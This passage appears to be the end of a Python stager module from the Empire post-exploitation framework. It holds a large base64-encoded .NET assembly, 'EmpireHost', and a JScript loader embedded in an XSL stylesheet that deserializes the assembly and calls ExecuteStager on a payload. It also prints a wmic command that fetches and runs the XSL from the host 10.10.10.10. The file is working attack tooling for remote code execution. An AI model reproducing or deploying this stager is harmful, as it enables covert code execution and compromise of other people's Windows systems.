"ZQByZWZPdXRBdXRoQnVmZmVyU2l6ZQBwdWxPdXRBdXRoQnVmZmVyU2l6ZQBhdXRoQnVmZmVyU2l6"+
"ZQBTZXRCdWZmZXJTaXplAGdldF9DdXJzb3JTaXplAHNldF9DdXJzb3JTaXplAGdldF9XaW5kb3dT"+
"aXplAHNldF9XaW5kb3dTaXplAGdldF9NYXhQaHlzaWNhbFdpbmRvd1NpemUAU2V0V2luZG93U2l6"+
"ZQBnZXRfTWF4V2luZG93U2l6ZQBTaXplT2YAUHJvbXB0Rm9yQ3JlZGVudGlhbHNGbGFnAFByb21w"+
"dEZvcldpbmRvd3NDcmVkZW50aWFsc0ZsYWcAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBGcm9t"+
"QmFzZTY0U3RyaW5nAFByb21wdEZvckNyZWRlbnRpYWxzV2l0aFNlY3VyZVN0cmluZwBQcm9tcHRG"+
"b3JXaW5kb3dzQ3JlZGVudGlhbHNXaXRoU2VjdXJlU3RyaW5nAFByb21wdFdpdGhTZWN1cmVTdHJp"+
"bmcAUHRyVG9TZWN1cmVTdHJpbmcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcFNl"+
"Y3VyZVN0cmluZwBSZWFkTGluZUFzU2VjdXJlU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBTdWJz"+
"dHJpbmcARm9yRWFjaABHZXRBbGxVc2Vyc0ZvbGRlclBhdGgAR2V0Rm9sZGVyUGF0aABQb3dlclNo"+
"ZWxsUm9vdEtleVBhdGgAZ2V0X1dpZHRoAGdldF9CdWZmZXJXaWR0aABnZXRfV2luZG93V2lkdGgA"+
"Z2V0X0xhcmdlc3RXaW5kb3dXaWR0aABnZXRfTGVuZ3RoAGxlbmd0aABteVJhd1VpAFB0clRvU3Ry"+
"aW5nVW5pAGluc3RhbmNlTG9jawBNYXJzaGFsAFBTQ3JlZGVudGlhbABQcm9tcHRGb3JDcmVkZW50"+
"aWFsAFByb21wdEZvckNyZWRlbnRpYWxzSW50ZXJuYWwAUHJvbXB0Rm9yV2luZG93c0NyZWRlbnRp"+
"YWxzSW50ZXJuYWwAZ2V0X0xhYmVsAEdldEhvdGtleUFuZExhYmVsAHNldF9DYW5jZWwAU3lzdGVt"+
"LkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsAFN5c3RlbS5Db21wb25lbnRNb2RlbABvbGUzMi5kbGwA"+
"Y3JlZHVpLmRsbABFbXBpcmVIb3N0LmRsbABCdWZmZXJDZWxsAGN1cnJlbnRQb3dlclNoZWxsAGZp"+
"bGwAcHJvZ3JhbQBSZUFsbG9jQ29UYXNrTWVtAGdldF9JdGVtAHNldF9JdGVtAE9wZXJhdGluZ1N5"+
"c3RlbQBUcmltAEVudW0AT3BlbgBvcmlnaW4AZ2V0X09TVmVyc2lvbgBnZXRfVmVyc2lvbgBJSG9z"+
"dFN1cHBvcnRzSW50ZXJhY3RpdmVTZXNzaW9uAE5vdGlmeUVuZEFwcGxpY2F0aW9uAE5vdGlmeUJl"+
"Z2luQXBwbGljYXRpb24AZ2V0X0xvY2F0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24A"+
"ZGVzdGluYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASUhvc3RVSVN1cHBvcnRzTXVsdGlwbGVD"+
"aG9pY2VTZWxlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0N1"+
"cnNvclBvc2l0aW9uAHNldF9DdXJzb3JQb3NpdGlvbgBnZXRfV2luZG93UG9zaXRpb24Ac2V0X1dp"+
"bmRvd1Bvc2l0aW9uAFNldFdpbmRvd1Bvc2l0aW9uAGdldF9DYXB0aW9uAHNldF9DYXB0aW9uAF9j"+
"YXB0aW9uAFdpbjMyRXhjZXB0aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAEFyZ3VtZW50T3V0"+
"T2ZSYW5nZUV4Y2VwdGlvbgBSdW50aW1lRXhjZXB0aW9uAEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBS"+
"ZXBvcnRFeGNlcHRpb24AU2VjdXJpdHlFeGNlcHRpb24ARmllbGREZXNjcmlwdGlvbgBDaG9pY2VE"+
"ZXNjcmlwdGlvbgBvcmlnaW5hbFVJQ3VsdHVyZUluZm8Ab3JpZ2luYWxDdWx0dXJlSW5mbwBQU0lu"+
"dm9jYXRpb25TdGF0ZUluZm8AZ2V0X0ludm9jYXRpb25TdGF0ZUluZm8AcFVpSW5mbwBLZXlJbmZv"+
"AFBTUHJvcGVydHlJbmZvAFplcm8AQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcABj"+
"bGlwAGdldF9XaW5kb3dUb3AAU3RvcABTeXN0ZW0uTGlucQBBcHBlbmRDaGFyAElGb3JtYXRQcm92"+
"aWRlcgBTdHJpbmdCdWlsZGVyAFNwZWNpYWxGb2xkZXIAc2VuZGVyAGNiQXV0aEJ1ZmZlcgBwdklu"+
"QXV0aEJ1ZmZlcgBwQXV0aEJ1ZmZlcgByZWZPdXRBdXRoQnVmZmVyAHBwdk91dEF1dGhCdWZmZXIA"+
"Q3JlZFBhY2tBdXRoZW50aWNhdGlvbkJ1ZmZlcgBDcmVkVW5QYWNrQXV0aGVudGljYXRpb25CdWZm"+
"ZXIARmx1c2hJbnB1dEJ1ZmZlcgBzZXRfQXV0aG9yaXphdGlvbk1hbmFnZXIARXhlY3V0ZVN0YWdl"+
"cgBFbXBpcmVMaXN0ZW5lcgBnZXRfSGJtQmFubmVyAHNldF9IYm1CYW5uZXIAaGJtQmFubmVyAGV4"+
"ZWN1dGVIZWxwZXIAVG9VcHBlcgBmb3JDdXJyZW50VXNlcgBBZGRQYXJhbWV0ZXIASW52YWxpZFBh"+
"cmFtZXRlcgBFbnRlcgBnZXRfTWFqb3IAZ2V0X0ZvcmVncm91bmRDb2xvcgBzZXRfRm9yZWdyb3Vu"+
"ZENvbG9yAGZvcmVncm91bmRDb2xvcgBnZXRfQmFja2dyb3VuZENvbG9yAHNldF9CYWNrZ3JvdW5k"+
"Q29sb3IAYmFja2dyb3VuZENvbG9yAENvbnNvbGVDb2xvcgBHZXRMYXN0V2luMzJFcnJvcgBkd0F1"+
"dGhFcnJvcgBhdXRoRXJyb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IA"+
"TW9uaXRvcgBhdXRoQnVmZmVyUHRyAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGdldF9D"+
"b21tYW5kcwBzZXRfQ29tbWFuZHMAR2V0UHJvZmlsZUNvbW1hbmRzAE5hdGl2ZU1ldGhvZHMARXh0"+
"ZW5zaW9uTWV0aG9kcwBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBkZWZh"+
"dWx0Q2hvaWNlcwBjaG9pY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEhvc3RVdGlsaXRpZXMAZ2V0"+
"X1Byb3BlcnRpZXMAUFNDcmVkZW50aWFsVHlwZXMAYWxsb3dlZENyZWRlbnRpYWxUeXBlcwBQaXBl"+
"bGluZVJlc3VsdFR5cGVzAENvb3JkaW5hdGVzAGdldF9GbGFncwBzZXRfRmxhZ3MASW52YWxpZEZs"+
"YWdzAGR3RmxhZ3MAZmxhZ3MAQ29uc29sZUNhbmNlbEV2ZW50QXJncwBwY2JQYWNrZWRDcmVkZW50"+
"aWFscwBwUGFja2VkQ3JlZGVudGlhbHMAZGVjcnlwdFByb3RlY3RlZENyZWRlbnRpYWxzAENyZWRV"+
"SVByb21wdEZvckNyZWRlbnRpYWxzAENyZWRVSVByb21wdEZvcldpbmRvd3NDcmVkZW50aWFscwBC"+
"dWlsZEhvdGtleXNBbmRQbGFpbkxhYmVscwBTeXN0ZW0uQ29sbGVjdGlvbnMAUFNDcmVkZW50aWFs"+
"VUlPcHRpb25zAFNjb3BlZEl0ZW1PcHRpb25zAFByb21wdEZvckNyZWRlbnRpYWxzT3B0aW9ucwBQ"+
"cm9tcHRGb3JXaW5kb3dzQ3JlZGVudGlhbHNPcHRpb25zAFJlYWRLZXlPcHRpb25zAGRlc2NyaXB0"+
"aW9ucwBvcHRpb25zAGdldF9DaGFycwB1bFBhc3N3b3JkTWF4Q2hhcnMAdWxVc2VyTmFtZU1heENo"+
"YXJzAFN1Y2Nlc3MAV3JpdGVQcm9ncmVzcwBNZXJnZU15UmVzdWx0cwBTY3JvbGxCdWZmZXJDb250"+
"ZW50cwBHZXRCdWZmZXJDb250ZW50cwBTZXRCdWZmZXJDb250ZW50cwBjb250ZW50cwBFeGlzdHMA"+
"Y3VycmVudFVzZXJBbGxIb3N0cwBhbGxVc2Vyc0FsbEhvc3RzAENvbmNhdABBcHBlbmRGb3JtYXQA"+
"QXNQU09iamVjdABnZXRfQmFzZU9iamVjdABHZXQAU2V0AGdldF9XaW5kb3dMZWZ0AGdldF9IZWln"+
"aHQAZ2V0X0J1ZmZlckhlaWdodABnZXRfV2luZG93SGVpZ2h0AGdldF9MYXJnZXN0V2luZG93SGVp"+
"Z2h0AFNwbGl0AGdldF9TaG91bGRFeGl0AHNldF9TaG91bGRFeGl0AFNldFNob3VsZEV4aXQAc2hv"+
"dWxkRXhpdABDcmVhdGVEZWZhdWx0AFByb21wdENyZWRlbnRpYWxzU2VjdXJlU3RyaW5nUmVzdWx0"+
"AElQcm9tcHRDcmVkZW50aWFsc1Jlc3VsdAByZXN1bHQARW52aXJvbm1lbnQAZ2V0X0h3bmRQYXJl"+
"bnQAc2V0X0h3bmRQYXJlbnQAaHduZFBhcmVudABnZXRfQ3VycmVudABnZXRfQ291bnQAQWRkU2Ny"+
"aXB0AEVudGVyTmVzdGVkUHJvbXB0AEV4aXROZXN0ZWRQcm9tcHQAQ29udmVydABUb0xpc3QAU3lz"+
"dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0AFBTSG9zdABFbXBpcmVIb3N0AGN1cnJlbnRV"+
"c2VyQ3VycmVudEhvc3QAYWxsVXNlcnNDdXJyZW50SG9zdABNeUhvc3QAbXlIb3N0AGlucHV0AE1v"+
"dmVOZXh0AFN5c3RlbS5UZXh0AHBzek1lc3NhZ2VUZXh0AHBzekNhcHRpb25UZXh0AFRvQXJyYXkA"+
"VG9DaGFyQXJyYXkAT3BlblN1YktleQBSZWFkS2V5AFBvd2VyU2hlbGxFbmdpbmVLZXkAUmVnaXN0"+
"cnlWZXJzaW9uS2V5AFJlZ2lzdHJ5S2V5AEdldEFzc2VtYmx5AEdldEVudHJ5QXNzZW1ibHkATWFr"+
"ZVJlYWRPbmx5AEVycm9yQ2F0ZWdvcnkAUnVuc3BhY2VGYWN0b3J5AFJlZ2lzdHJ5AGdldF9DYXBh"+
"Y2l0eQBzZXRfQ2FwYWNpdHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBTeXN0ZW0uU2VjdXJp"+
"dHkASXNOdWxsT3JFbXB0eQBQU05vdGVQcm9wZXJ0eQAAAAtEAHUAbQBtAHkAABVQAG8AdwBlAHIA"+
"UwBoAGUAbABsAAAXbwB1AHQALQBkAGUAZgBhAHUAbAB0AAEpSABvAHMAdAAuAFIAZQBwAG8AcgB0"+
"AEUAeABjAGUAcAB0AGkAbwBuAAANJABpAG4AcAB1AHQAABVvAHUAdAAtAHMAdAByAGkAbgBnAAEN"+
"RQBtAHAAaQByAGUAAIClQwBhAG4AbgBvAHQAIABzAHUAcwBwAGUAbgBkACAAdABoAGUAIABzAGgA"+
"ZQBsAGwALAAgAEUAbgB0AGUAcgBOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABtAGUAdABo"+
"AG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AEgA"+
"bwBzAHQALgAAd1QAaABlACAARQB4AGkAdABOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABt"+
"AGUAdABoAG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAA"+
"TQB5AEgAbwBzAHQALgAAAwoAAAMgAAAVfAB7ADAAfQA+ACAAewAxAH0AIAAAI1sARABlAGYAYQB1"+
"AGwAdAAgAGkAcwAgACgAewAwAH0AXQAAIUkAbgB2AGEAbABpAGQAIABjAGgAbwBpAGMAZQA6ACAA"+
"ACtbAEQAZQBmAGEAdQBsAHQAIABjAGgAbwBpAGMAZQBzACAAYQByAGUAIAAAJ1sARABlAGYAYQB1"+
"AGwAdAAgAGMAaABvAGkAYwBlACAAaQBzACAAAA0iAHsAMAB9ACIALAAAA10AABlDAGgAbwBpAGMA"+
"ZQBbAHsAMAB9AF0AOgAAFUQARQBCAFUARwA6ACAAewAwAH0AABlWAEUAUgBCAE8AUwBFADoAIAB7"+
"ADAAfQAAGVcAQQBSAE4ASQBOAEcAOgAgAHsAMAB9AAAhQQBsAGwAVQBzAGUAcgBzAEEAbABsAEgA"+
"bwBzAHQAcwAAJ0EAbABsAFUAcwBlAHIAcwBDAHUAcgByAGUAbgB0AEgAbwBzAHQAACdDAHUAcgBy"+
"AGUAbgB0AFUAcwBlAHIAQQBsAGwASABvAHMAdABzAAAtQwB1AHIAcgBlAG4AdABVAHMAZQByAEMA"+
"dQByAHIAZQBuAHQASABvAHMAdAAAGXMAZQB0AC0AdgBhAHIAaQBhAGIAbABlAAEJTgBhAG0AZQAA"+
"D3AAcgBvAGYAaQBsAGUAAAtWAGEAbAB1AGUAAA1PAHAAdABpAG8AbgAAI1cAaQBuAGQAbwB3AHMA"+
"UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs"+
"AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA"+
"bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu"+
"AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy"+
"AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA"+
"aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy"+
"AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg"+
"AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA"+
"IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk"+
"AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A"+
"dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA"+
"aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0"+
"AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA"+
"UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA"+
"ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp"+
"AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA"+
"ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ"+
"AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA"+
"ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA"+
"C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S"+
"sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c"+
"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"+
"Dg4OGAkABRIoDg4ODg4KAAYSKA4ODhgODgYAARIoEkQIAAMSKBJEDg4HAAMSLA4ODggABBIsDg4O"+
"GA0ABRIsDg4OEoC1EoC1DgAGEiwODg4YEoC1EoC1BgABEiwSRAwAAxIsEkQSgLUSgLUNEAEDHgAS"+
"RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO"+
"Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY"+
"GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI"+
"BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA"+
"EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC"+
"FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB"+
"ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky"+
"OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA"+
"UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI"+
"b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc"+
"kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y"+
"RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA"+
"AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs"+
"AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA"+
"AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu"+
"AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA"+
"aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv"+
"AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A"+
"CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0"+
"AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A"+
"AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA"+
"AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA"+
"IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA"+
"AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA"+
"SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw"+
"AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA"+
"LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu"+
"ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl"+
"bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'EmpireHost';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
o.ExecuteStager(EncodedPayload);
} catch (e) {
debug(e.message);
}
]]></ms:script>
</stylesheet>
"""
command = """\n[+] wmic process get brief /format:"http://10.10.10.10/launcher.xsl" """
print colored(command, 'green', attrs=['bold'])
return code
| bsd-3-clause | -4,492,481,551,449,662,500 | 82.566216 | 209 | 0.755138 | false |
